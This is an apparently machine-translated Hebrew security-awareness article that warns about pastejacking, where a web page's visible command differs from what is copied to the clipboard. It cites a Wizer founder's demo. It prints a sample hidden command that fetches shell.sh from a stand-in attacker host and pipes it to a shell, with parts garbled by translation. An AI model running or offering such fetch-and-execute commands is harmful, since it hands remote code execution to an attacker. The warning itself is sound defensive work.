כיצד העתקה והדבקה יכולה להכניס אותך לצרות יותר ממה שאתה חושב

זה נכון שאנחנו חיים בעידן שבו מהירות היא הכל, ולהשיג תוצאות מהירות זה כל מה שחשוב. עם זאת, מעטים האנשים שבאמת עוצרים לשנייה וחושבים על ההשלכות.

על בסיס יומיומי, מיליוני מתכנתים, מנהלים וחוקרי אבטחה מבצעים משימות פשוטות כמו העתקה והדבקה של פקודות מדפי אינטרנט ישירות לתוך הקונסולות במחשבים האישיים שלהם.

למרות שרבים אפילו לא מקדישים לכך מחשבה שנייה, ההשלכות גדולות ומסוכנות יותר ממה שאתה עשוי לחשוב בהתחלה, במיוחד אם אתה מאחסן נתונים רגישים או בעלי ערך.

מומחה אבטחה ידוע לקח את הזמן לשתף מה יכול לקרות בפועל אם אתה מעתיק+מדביק תוכן מדפי אינטרנט.

העתק+הדבק היא דרך קלה להיפרץ בפועל

גבריאל פרידלנדר, שהוא המייסד של פלטפורמת האימון למודעות אבטחה Wizer, הסיר את הכריכה מעל תוכנית שתגרום לך לחשוב פעמיים לפני העתקה והדבקה של פקודות מדפי אינטרנט.

העתקה והדבקה של תוכן מהאינטרנט הפכה כל כך נפוצה בימינו, שאף אחד אפילו לא חושב על זה.

עם זאת, פרידלנדר מזהיר שדפי אינטרנט מסוימים הם מטעים יותר ממה שאפשר להבין בהתחלה, ומה שאתה חושב שהעתקת מהם שונה מאוד ממה שעשית בפועל.

והחלק הגרוע בכל זה הוא שללא הידע או ההדרכה הדרושים, הקורבנות מבינים את טעותם רק לאחר הדבקת הטקסט, ואז זה כבר עלול להיות מאוחר מדי.

מנתח האבטחה גם הגה מבחן קטן עבור קוראי הבלוג שלו, רק כדי שאנשים יבינו באמת כמה קל לכם לפתוח את הדלת ללא רצון לפושעי סייבר.

הוא סיפק פקודה שנועדה להיות מועתקת, אבל האמת הנוגעת נחשפת רק כאשר אתה מדביק את הטקסט ותראה מה בעצם הכנסת בהגדרות שלך.

לאחר העתקת הפקודה המוצגת בצילום המסך למעלה, התוצאה של הדבקתה תזעזע אותך, מכיוון שהיא רחוקה ממה שחשבת שאתה משכפל.

סִלְסוּל http://attacker-domain: 8000/shell.sh | ש

מלבד הפקודה השונה בתכלית הקיימת בלוח שלך, תו השורה החדשה (או החזרה) ב הסוף שלו אומר שהדוגמה שלמעלה תתבצע ברגע שהיא תודבק ישירות לתוך לינוקס מָסוֹף.

אז כדאי שתהיה מודע יותר למה שקורה בפועל ותתייחס לזה כאל סכנה בטיחותית רצינית. אנחנו לא אומרים שכל האתרים מסתירים תוכן זדוני, אבל כדאי לקחת זאת בחשבון.

האם אי פעם פרצו לך מהדבקת פקודות מפוקפקות בטרמינל שלך? שתף אותנו בחוויה שלך בקטע ההערות למטה.